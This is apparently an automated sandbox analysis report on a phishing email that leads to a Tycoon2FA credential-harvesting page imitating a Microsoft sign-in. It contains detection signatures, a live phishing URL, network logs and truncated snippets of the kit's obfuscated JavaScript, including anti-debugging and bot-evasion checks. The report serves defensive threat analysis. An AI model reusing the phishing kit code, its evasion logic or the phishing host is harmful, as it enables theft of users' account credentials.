Edit tour

Windows Analysis Report
EXTERNAL Cash Flow Analysis Final Review Needed Before Submission.msg

Overview

General Information

Sample name:EXTERNAL Cash Flow Analysis Final Review Needed Before Submission.msg
Analysis ID:1647391
MD5:59791b126cb90cb29d3be13d72208ce9
SHA1:f083e04100326fde1217518ff969db50198f5e96
SHA256:0e0043ac52302481501f45587465379ceb916c1909d47a14ed8a48b1d5254269
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
AI detected suspicious elements in Email content
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores large binary data to the registry
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 5876 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\EXTERNAL Cash Flow Analysis Final Review Needed Before Submission.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 3740 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "7779AF13-4480-4A6E-89EB-D436C599513A" "788ADFE0-12BE-4AF4-B40B-26DCFAAF58F4" "5876" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 4500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\LVP5IGKL\NewSecureMessage.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 6716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,11133686377390533759,9087752082049990880,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_123JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    SourceRuleDescriptionAuthorStrings
    0.0.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      0.9.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        0.0.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
          0.5.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            0.1.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 21 entries
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 5876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'asix.jiitimeztcw.es' does not match the legitimate domain for Microsoft., The URL contains a suspicious domain 'jiitimeztcw.es' which is not associated with Microsoft., The use of a subdomain 'asix' and an unusual domain extension '.es' raises suspicion., The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts. DOM: 1.3.pages.csv
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: Yara matchFile source: 2.5.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.6..script.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.19..script.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_123, type: DROPPED
              Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.9.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.5.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 1.12..script.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: Yara matchFile source: 2.5.pages.csv, type: HTML
              Source: 0.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://asix.jiitimeztcw.es/ERcPqD/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code, the presence of anti-debugging techniques, and the attempt to disable right-click context menus further increase the risk. Overall, this script exhibits a high degree of malicious intent and should be considered a significant security threat.
              Source: 0.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://asix.jiitimeztcw.es/ERcPqD/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be attempting to execute a malicious payload by decoding and executing a heavily obfuscated string. This is a clear indication of a high-risk, potentially malicious script that should be blocked or further investigated.
              Source: 0.6..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://asix.jiitimeztcw.es/ERcPqD/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: 0.7..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://asix.jiitimeztcw.es/ERcPqD/... This script exhibits several high-risk behaviors, including dynamic code execution through the use of `atob()` and string manipulation to create a new function, as well as potential data exfiltration by sending data to an unknown external domain. The heavy obfuscation of the code and URLs further increases the risk. While the specific intent is unclear, the overall behavior is highly suspicious and likely malicious.
              Source: 1.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjr... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It attempts to detect the presence of web automation tools, redirects to a suspicious domain, and includes a function that decodes and executes encoded content. These behaviors are highly indicative of malicious intent, warranting a high-risk score.
              Source: 1.15..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjr... The provided JavaScript snippet contains several high-risk indicators, including dynamic code execution via `eval()` and potential data exfiltration. The script also uses obfuscated code and interacts with multiple fallback domains, some of which may be of dubious reputation. Overall, the combination of these behaviors suggests a high likelihood of malicious intent, warranting a high-risk score.
              Source: 1.11..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjr... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, redirects the user to a blank page, and intercepts various keyboard and mouse events to prevent common debugging and security actions. Additionally, it includes a setInterval loop that appears to be a debugger trap, potentially indicating malicious intent. Overall, this script demonstrates a high level of suspicious and potentially malicious activity.
              Source: EmailJoe Sandbox AI: Detected potential phishing email: Suspicious sender domain 'transervicoches.com' doesn't match typical financial/business domains. Generic urgent subject line about financial matters is a common phishing tactic. Single encrypted attachment (smime.p7m) without context is suspicious
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: Number of links: 0
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://asix.jiitimeztcw.es/ERcPqD/HTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function arYfyZjjzS(event) { co...
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: Title: Secure Account Sign-In does not match URL
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: Invalid link: Terms of use
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: Invalid link: Privacy & cookies
              Source: https://asix.jiitimeztcw.es/ERcPqD/HTTP Parser: function cyhkajasia(){qyjsdaufuk = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+vgvjacbtb2x1dglvbnmglsbjbm5vdmf0aw5nihrozsbgdxr1cmu8l3rpdgxlpgogidxzdhlszt4kicagigjvzhkgewogicagicbmb250lwzhbwlsetogqxjpywwsihnhbnmtc2vyawy7ciagicagigxpbmutagvpz2h0oiaxljy7ciagicagig1hcmdpbjogmdskicagicagcgfkzgluzzogmdskicagicagymfja2dyb3vuzc1jb2xvcjogi2y0zjrmndskicagicagy29sb3i6icmzmzm7ciagicb9ciagicbozwfkzxigewogicagicbiywnrz3jvdw5koiajmda1ytllowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzogmjbwecawowogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogmi41cmvtowogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogizmzmzskicagicagy29sb3i6icnmzmy7ciagicagihbhzgrpbmc6idewchg7ciagicagihrlehqtywxpz246ignlbnrlcjskicagih0kicagig5hdibhihskicagicagy29sb3i6icnmzmy7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagicagbwfyz2luoiawide1chg7c...
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "ophioo";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "/dpk6vyifh8hgqwi3tfqudhev9d38ixl8ospf44irmximu5zwcdl1v";var gdf = "/ijota80lkv5un32uqjwx6r6zakjigdme5uyrcd120";var odf = "/ghyeexey50xwb5libi65nkmiybzqy4yzkuqzjsomjtcd645";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.match(/edg/i)){ ...
              Source: EmailClassification: Invoice Scam
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: <input type="password" .../> found
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: No favicon
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: No <meta name="author".. found
              Source: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMHTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 172.67.221.194:443 -> 192.168.2.17:49823 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.221.194:443 -> 192.168.2.17:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.221.194:443 -> 192.168.2.17:49827 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.17:49846 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.17:49845 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.17:49852 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.17:49858 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.17:49866 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.196.11:443 -> 192.168.2.17:49903 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.92.165:443 -> 192.168.2.17:49917 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.221.194:443 -> 192.168.2.17:49932 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49945 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.17:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.96:443 -> 192.168.2.17:49979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.96:443 -> 192.168.2.17:49978 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.17:49988 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.96:443 -> 192.168.2.17:49993 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.96:443 -> 192.168.2.17:50004 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:50056 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 18MB later: 32MB
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.40
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /ERcPqD/ HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://asix.jiitimeztcw.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
